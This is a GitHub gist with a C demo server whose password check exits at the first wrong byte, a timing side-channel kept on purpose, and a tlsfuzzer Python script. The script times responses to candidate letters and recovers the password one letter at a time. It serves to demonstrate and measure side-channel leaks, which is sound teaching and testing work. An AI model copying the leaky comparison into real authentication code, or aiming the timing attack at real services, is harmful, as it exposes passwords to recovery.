Created
October 15, 2023 18:45
-
-
Save tomato42/46b8f6a1a05fb894d3a26b3ace6d6df1 to your computer and use it in GitHub Desktop.
Example server checking password with a timing side-channel and a tlsfuzzer script to attack it
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <stdlib.h> | |
#include <fcntl.h> | |
#include <sys/types.h> | |
#include <unistd.h> | |
#include <netdb.h> | |
#include <netinet/in.h> | |
#include <string.h> | |
#include <stdint.h> | |
#include <inttypes.h> | |
#include <byteswap.h> | |
void doprocessing (int sock, const char *password); | |
/*
 * Entry point of the example password server.
 *
 * De-obfuscates the built-in password, binds a TCP listening socket to
 * port 5001 on all IPv4 interfaces and then serves clients strictly one
 * after another, passing every accepted socket to doprocessing().
 *
 * The accept loop never terminates on its own; the process exits with
 * status 1 when creating, configuring, binding or listening on the socket
 * fails, or when accept() reports an error.
 */
int main( int argc, char *argv[] ) {
    int sockfd, newsockfd, portno;
    struct sockaddr_in serv_addr, cli_addr;
    /* accept() takes a socklen_t *, not an unsigned int * */
    socklen_t clilen;
    int enable = 1;

    /* simple obfuscation of the password */
    char ciphertext[32] = "\x4b\x71\xbc\xe8\x41\xf0\xbf\x96\xff\xf4\x09\xc2\x6c\x1b\x44\x63\xa2\xfc\xda\xb7\xd1\x23\x96\x25\x98\xca\xfb\xe9\x70\xc4\x15\x55";
    char key[32] = "\x26\x10\xce\x9e\x28\x9e\xbf\x96\x3c\xd1\x93\x39\xb7\xb6\xdd\x31\xc1\xd9\xad\x49\x00\x82\x1c\xc5\xcc\x30\x49\x77\x3d\x8b\x39\x14";
    char password[32];

    /*
     * Bytes 6 and 7 are identical in ciphertext and key, so the XOR leaves
     * a NUL at index 6; that NUL is what terminates the password for the
     * comparison loop in doprocessing().
     */
    for (int i = 0; i < 32; i++)
        password[i] = ciphertext[i] ^ key[i];

    /* First call to socket() function */
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) {
        perror("ERROR opening socket");
        exit(1);
    }

    /* allow quick restarts of the server on the same port */
    if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &enable, sizeof(enable)) < 0) {
        perror("ERROR can't set SO_REUSEADDR");
        exit(1);
    }

    /* Initialize socket structure */
    memset(&serv_addr, 0, sizeof(serv_addr));
    portno = 5001;
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = INADDR_ANY;
    serv_addr.sin_port = htons(portno);

    /* Now bind the host address using bind() call. */
    if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) {
        perror("ERROR on binding");
        exit(1);
    }

    /* Now start listening for the clients; a failure here used to go
     * unnoticed and only surfaced later as an accept() error.
     */
    if (listen(sockfd, 5) < 0) {
        perror("ERROR on listen");
        exit(1);
    }

    while (1) {
        /* accept() overwrites the length with the size of the returned
         * address, so it has to be reset before every call
         */
        clilen = sizeof(cli_addr);
        newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);
        if (newsockfd < 0) {
            perror("ERROR on accept");
            exit(1);
        }
        doprocessing(newsockfd, password);
    } /* end of while */
}
/* Return non-zero when c ends a password string (newline or NUL). */
static int at_end (char c) {
    return c == '\n' || c == '\x00';
}

/*
 * Compare the client's guess against the expected password.
 *
 * The comparison walks both strings in lock-step and returns as soon as
 * one byte differs. This early exit is the timing side-channel the example
 * exists to demonstrate, so it is kept on purpose.
 *
 * Returns 1 when every byte matched and both strings ended at the same
 * position, 0 otherwise.
 */
static int password_matches (const char *guess, const char *expected) {
    while (!at_end(*guess) && !at_end(*expected)) {
        if (*guess != *expected) {
            return 0;
        }
        guess++;
        expected++;
    }
    /* a prefix of the password (or a longer guess) is not a match */
    return at_end(*guess) && at_end(*expected);
}

/*
 * Handle one client connection on sock.
 *
 * Reads at most 32 bytes from the client, checks them against password
 * and, on a match, sends "secret\n". In every case a TLS Alert message is
 * sent afterwards (for ease of analysis with tlsfuzzer) and the socket is
 * shut down and closed.
 *
 * Any read, write or shutdown error terminates the whole process with
 * exit status 1.
 */
void doprocessing (int sock, const char *password) {
    char data[33];
    int ret;

    ret = read(sock, data, 32);
    if (ret < 0) {
        perror("ERROR reading from socket");
        exit(1);
    }
    /* the buffer has one spare byte, so terminating at ret is always safe */
    data[ret] = '\x00';

    if (password_matches(data, password)) {
        /* provide the secret if the password was correct */
        ret = write(sock, "secret\n", 7);
        if (ret < 0) {
            perror("ERROR writing to socket");
            exit(1);
        }
    }

    /* reply with a TLS Alert message for ease of analysis with tlsfuzzer */
    ret = write(sock, "\x15\x03\x03\x00\x02\x02\x28", 7);
    if (ret < 0) {
        perror("ERROR writing to socket");
        exit(1);
    }

    ret = shutdown(sock, SHUT_RDWR);
    if (ret < 0) {
        perror("ERROR closing socket");
        exit(1);
    }
    close(sock);
}
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Author: Hubert Kario, (c) 2023 | |
# Released under Gnu GPL v2.0, see LICENSE file for details | |
"""Timing tester of a password server.""" | |
from __future__ import print_function | |
import traceback | |
import sys | |
import getopt | |
from itertools import chain, repeat | |
from random import sample | |
import os | |
from tlsfuzzer.runner import Runner | |
from tlsfuzzer.timing_runner import TimingRunner | |
from tlsfuzzer.messages import Connect, ClientHelloGenerator, \ | |
ClientKeyExchangeGenerator, ChangeCipherSpecGenerator, \ | |
FinishedGenerator, ApplicationDataGenerator, AlertGenerator, \ | |
TCPBufferingEnable, TCPBufferingDisable, TCPBufferingFlush, fuzz_mac, \ | |
fuzz_padding, RawSocketWriteGenerator | |
from tlsfuzzer.expect import ExpectServerHello, ExpectCertificate, \ | |
ExpectServerHelloDone, ExpectChangeCipherSpec, ExpectFinished, \ | |
ExpectAlert, ExpectClose | |
from tlslite.constants import CipherSuite, AlertLevel, AlertDescription, \ | |
ExtensionType | |
from tlslite.utils.dns_utils import is_valid_hostname | |
from tlslite.extensions import SNIExtension, SignatureAlgorithmsCertExtension,\ | |
SignatureAlgorithmsExtension | |
from tlsfuzzer.utils.lists import natural_sort_keys | |
from tlsfuzzer.utils.ordered_dict import OrderedDict | |
from tlsfuzzer.helpers import SIG_ALL, RSA_PKCS1_ALL | |
from tlsfuzzer.utils.statics import WARM_UP | |
from tlsfuzzer.utils.log import Log | |
version = 1 | |
def help_msg():
    """Print the command line usage summary of the script to stdout.

    The defaults quoted in the text mirror the initial values set at the
    top of main(): port 5001 and, when -n is not given, all probes.
    """
    print("Usage: <script-name> [-h hostname] [-p port] [[probe-name] ...]")
    print(" -h hostname name of the host to run the test against")
    print(" localhost by default")
    # main() connects to 5001 unless -p is given, not to 4433
    print(" -p port port number to use for connection, 5001 by default")
    print(" probe-name if present, will run only the probes with given")
    print(" names and not all of them, e.g \"sanity\"")
    print(" -e probe-name exclude the probe from the list of the ones run")
    print(" may be specified multiple times")
    print(" -x probe-name expect the probe to fail. When such probe passes despite being marked like this")
    print(" it will be reported in the test summary and the whole script will fail.")
    print(" May be specified multiple times.")
    print(" -X message expect the `message` substring in exception raised during")
    print(" execution of preceding expected failure probe")
    print(" usage: [-x probe-name] [-X exception], order is compulsory!")
    # without -n main() runs every probe, there is no limit of 50
    print(" -n num run 'num' or all(if 0) tests instead of default(all)")
    print(" (excluding \"sanity\" tests)")
    print(" -a desc the expected alert description for invalid Finished")
    print(" messages - 20 (bad_record_mac) by default")
    print(" Note: other values are NOT RFC compliant!")
    print(" -l level the expected alert level for invalid Finished")
    print(" - 2 (fatal) by default")
    print(" Note: other values are NOT RFC compliant!")
    print(" -i interface Allows recording timing information")
    print(" on specified interface. Required to enable timing tests")
    print(" -o dir Specifies output directory for timing information")
    print(" /tmp by default")
    print(" --base str Already guessed letters")
    print(" --repeat rep How many timing samples should be gathered for each test")
    print(" 100 by default")
    print(" --no-safe-renego Allow the server not to support safe")
    print(" renegotiation extension")
    print(" --no-sni do not send server name extension.")
    print(" Sends extension by default if the hostname is a")
    print(" valid DNS name, not an IP address")
    print(" --cpu-list Set the CPU affinity for the tcpdump process")
    print(" See taskset(1) man page for the syntax of this")
    print(" option. Not used by default.")
    print(" --byte-len Number of bytes to encode the values in, 1 by default")
    print(" --baseline Number sent for the base measurement, 10 by default")
    print(" --difference Number that the baseline is modified to create signal, 1 by default")
    print(" --no-quickack Don't assume that QUICKACK is in use.")
    print(" --no-alert Don't expect the server to send an alert before closing connection.")
    print(" --help this message")
def main():
    """Check if server doesn't process password byte by byte

    Parses the command line, builds one conversation per candidate next
    letter ('a'..'z' appended to the already guessed ``--base`` prefix, plus
    a duplicate "a - canary" probe), runs each of them once as a functional
    check (with the "sanity" probe first and last) and prints a summary.

    When the functional run is clean and ``-i`` was given, the payloads are
    pre-generated into ``data_values.bin`` in a shuffled order, replayed
    through a single generic conversation under TimingRunner, and the
    captured timings are extracted and analysed.

    Exits the process with status 1 when a probe fails unexpectedly (or
    passes while expected to fail) or when tcpdump is unavailable, and with
    the runner/analysis status when the timing run or the analysis reports
    an abnormal result.
    """
    host = "localhost"
    port = 5001
    num_limit = None
    run_exclude = set()
    expected_failures = {}
    last_exp_tmp = None
    repetitions = 100
    interface = None
    timing = False
    outdir = "/tmp"
    affinity = None
    no_alert = False
    no_quickack = False
    base = ""
    # The values below are only accepted so that the common tlsfuzzer
    # command line keeps working; nothing in this script reads them.
    alert = AlertDescription.bad_record_mac
    level = AlertLevel.fatal
    srv_extensions = {ExtensionType.renegotiation_info: None}
    no_sni = False
    byte_len = 0
    baseline = 10
    difference = 1

    argv = sys.argv[1:]
    opts, args = getopt.getopt(argv,
                               "h:p:e:x:X:n:a:l:o:i:",
                               ["help",
                                "no-safe-renego",
                                "no-sni",
                                "repeat=",
                                "cpu-list=",
                                "baseline=",
                                "difference=",
                                "base=",
                                "no-quickack",
                                "no-alert"])
    for opt, arg in opts:
        if opt == '-h':
            host = arg
        elif opt == '-p':
            port = int(arg)
        elif opt == '-e':
            run_exclude.add(arg)
        elif opt == '-x':
            expected_failures[arg] = None
            last_exp_tmp = str(arg)
        elif opt == '-X':
            if not last_exp_tmp:
                raise ValueError("-x has to be specified before -X")
            expected_failures[last_exp_tmp] = str(arg)
        elif opt == '-n':
            num_limit = int(arg)
        elif opt == '-a':
            alert = int(arg)
        elif opt == '-l':
            level = int(arg)
        elif opt == "-i":
            timing = True
            interface = arg
        elif opt == '-o':
            outdir = arg
        elif opt == "--repeat":
            repetitions = int(arg)
        elif opt == "--no-safe-renego":
            srv_extensions = None
        elif opt == "--no-sni":
            no_sni = True
        elif opt == "--cpu-list":
            affinity = arg
        elif opt == "--byte-len":
            # NOTE(review): "byte-len=" is not in the getopt list above, so
            # getopt rejects the option before this branch can run, and the
            # payload length is recomputed from --base below anyway.
            # Decide whether to drop the option or wire it up.
            byte_len = int(arg)
            if byte_len < 1:
                raise ValueError("--byte-len must be a positive integer")
        elif opt == "--baseline":
            baseline = int(arg)
            if baseline < 0:
                raise ValueError("--baseline can't be negative")
        elif opt == "--difference":
            difference = int(arg)
            if difference < 0:
                raise ValueError("--difference can't be negative")
        elif opt == "--no-quickack":
            no_quickack = True
        elif opt == "--base":
            base = arg
        elif opt == '--help':
            help_msg()
            sys.exit(0)
        elif opt == "--no-alert":
            no_alert = True
        else:
            raise ValueError("Unknown option: {0}".format(opt))

    if args:
        run_only = set(args)
    else:
        run_only = None

    conversations = OrderedDict()
    generators = OrderedDict()

    # sanity probe: any wrong input must be answered with alert + close
    conversation = Connect(host, port)
    node = conversation
    node = node.add_child(RawSocketWriteGenerator(b"X"))
    node = node.add_child(ExpectAlert())
    node.add_child(ExpectClose())
    conversations["sanity"] = conversation

    # canary: same payload as the "a" probe, under a different name
    canary_payload = (base + 'a').encode('utf-8')
    # Every probe appends exactly one ASCII letter to the same prefix, so
    # all payloads share this length. Measure it on the encoded bytes: the
    # timing code compares it with len(data), which differs from the
    # character count when --base holds non-ASCII text.
    byte_len = len(canary_payload)
    conversation = Connect(host, port)
    node = conversation
    node = node.add_child(RawSocketWriteGenerator(canary_payload))
    gen_node = node
    node = node.add_child(ExpectAlert())
    node.add_child(ExpectClose())
    conversations["a - canary"] = conversation
    generators["a - canary"] = gen_node

    # one probe per candidate for the next password letter
    for i in range(26):
        lttr = chr(ord('a') + i)
        conversation = Connect(host, port)
        node = conversation
        node = node.add_child(
            RawSocketWriteGenerator((base + lttr).encode('utf-8')))
        gen_node = node
        node = node.add_child(ExpectAlert())
        node.add_child(ExpectClose())
        conversations["{0}".format(lttr)] = conversation
        generators["{0}".format(lttr)] = gen_node

    # run the conversation
    good = 0
    bad = 0
    xfail = 0
    xpass = 0
    failed = []
    xpassed = []
    if not num_limit:
        num_limit = len(conversations)

    # make sure that sanity test is run first and last
    # to verify that server was running and kept running throughout
    sanity_tests = [('sanity', conversations['sanity'])]
    if run_only:
        if num_limit > len(run_only):
            num_limit = len(run_only)
        regular_tests = [(k, v) for k, v in conversations.items()
                         if k in run_only]
    else:
        regular_tests = [(k, v) for k, v in conversations.items()
                         if (k != 'sanity') and k not in run_exclude]
    if num_limit < len(conversations):
        sampled_tests = sample(regular_tests,
                               min(num_limit, len(regular_tests)))
    else:
        sampled_tests = regular_tests
    ordered_tests = chain(sanity_tests, sampled_tests, sanity_tests)

    for c_name, c_test in ordered_tests:
        print("{0} ...".format(c_name))

        runner = Runner(c_test)

        res = True
        exception = None
        try:
            runner.run()
        except Exception as exp:
            # top-level boundary: any failure of a probe is reported and
            # counted, it must not abort the remaining probes
            exception = exp
            print("Error while processing")
            print(traceback.format_exc())
            res = False

        if c_name in expected_failures:
            if res:
                xpass += 1
                xpassed.append(c_name)
                print("XPASS-expected failure but test passed\n")
            else:
                if expected_failures[c_name] is not None and \
                        expected_failures[c_name] not in str(exception):
                    bad += 1
                    failed.append(c_name)
                    print("Expected error message: {0}\n"
                          .format(expected_failures[c_name]))
                else:
                    xfail += 1
                    print("OK-expected failure\n")
        else:
            if res:
                good += 1
                print("OK\n")
            else:
                bad += 1
                failed.append(c_name)

    print("Test end")
    print(20 * '=')
    print("""Test timing of server doing password compare""")
    print(20 * '=')
    print("version: {0}".format(version))
    print(20 * '=')
    print("TOTAL: {0}".format(len(sampled_tests) + 2 * len(sanity_tests)))
    print("SKIP: {0}".format(
        len(run_exclude.intersection(conversations.keys()))))
    print("PASS: {0}".format(good))
    print("XFAIL: {0}".format(xfail))
    print("FAIL: {0}".format(bad))
    print("XPASS: {0}".format(xpass))
    print(20 * '=')
    sort = sorted(xpassed, key=natural_sort_keys)
    if sort:
        print("XPASSED:\n\t{0}".format('\n\t'.join(repr(i) for i in sort)))
    sort = sorted(failed, key=natural_sort_keys)
    if sort:
        print("FAILED:\n\t{0}".format('\n\t'.join(repr(i) for i in sort)))

    if bad or xpass:
        sys.exit(1)
    elif timing:
        # if regular tests passed, run timing collection and analysis
        if TimingRunner.check_tcpdump():
            tests = [('generic', None)]

            timing_runner = TimingRunner("{0}_v{1}".format(
                                             sys.argv[0],
                                             version),
                                         tests,
                                         outdir,
                                         host,
                                         port,
                                         interface,
                                         affinity,
                                         skip_extract=True,
                                         no_quickack=no_quickack)
            values_path = os.path.join(timing_runner.out_dir,
                                       'data_values.bin')

            print("Pre-generating pre-master secret values...")

            with open(values_path, "wb") as data_file:
                # create a real order of tests to run
                log = Log(os.path.join(timing_runner.out_dir,
                                       "real_log.csv"))
                actual_tests = []
                node_dict = {}
                for c_name, c_test in sampled_tests:
                    if (run_only and c_name not in run_only) or \
                            c_name in run_exclude:
                        continue
                    if not c_name.startswith("sanity"):
                        actual_tests.append(c_name)
                        node_dict[c_name] = generators[c_name]

                log.start_log(actual_tests)
                for _ in range(repetitions):
                    log.shuffle_new_run()
                log.write()
                log.read_log()
                test_classes = log.get_classes()
                # WARM_UP extra queries of class 0 precede the real log
                queries = chain(repeat(0, WARM_UP), log.iterate_log())

                # write the payloads in exactly the order they will be sent
                for index in queries:
                    payload = node_dict[test_classes[index]].data
                    # fixed-size records: the generic conversation below
                    # reads the file back in byte_len sized chunks
                    assert len(payload) == byte_len, \
                        len(payload)
                    data_file.write(payload)

            # fake the set of tests to run so it's just one
            # The read handle only has to stay open while the runner is
            # replaying the payloads; close it as soon as the run is over.
            with open(values_path, "rb") as data_file:
                conversation = Connect(host, port)
                node = conversation
                node = node.add_child(RawSocketWriteGenerator(
                    data_file=data_file,
                    data_length=byte_len
                ))
                node = node.add_child(ExpectAlert())
                node.add_child(ExpectClose())

                tests[:] = [('generic', conversation)]

                print("Running timing tests...")
                timing_runner.generate_log(
                    ['generic'], [],
                    repetitions * len(actual_tests))
                ret_val = timing_runner.run()

            if ret_val != 0:
                print("run failed")
                sys.exit(ret_val)

            # replace the single-class log with the real, shuffled one so
            # that the extraction attributes samples to the right probes
            os.remove(os.path.join(timing_runner.out_dir, 'log.csv'))
            os.rename(
                os.path.join(timing_runner.out_dir, 'real_log.csv'),
                os.path.join(timing_runner.out_dir, 'log.csv')
            )

            print("starting extraction")
            if not timing_runner.extract(fin_as_resp=no_alert):
                print("extract")
                ret_val = 2
            else:
                print("analysis")
                ret_val = timing_runner.analyse()

            if ret_val == 0:
                print("No statistically significant difference detected")
            elif ret_val == 1:
                print("Statistically significant difference detected")
            else:
                print("Statistical analysis exited with {0}".format(ret_val))
                # NOTE(review): assumed to belong to this branch only, so
                # that the closing separator below is still printed for
                # results 0 and 1 - confirm against the author's intent
                sys.exit(ret_val)
        else:
            print("Could not run timing tests because tcpdump is not present!")
            sys.exit(1)
        print(20 * '=')
# Run the tester only when the file is executed as a script, so that
# importing it has no side effects.
if __name__ == "__main__":
    main()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment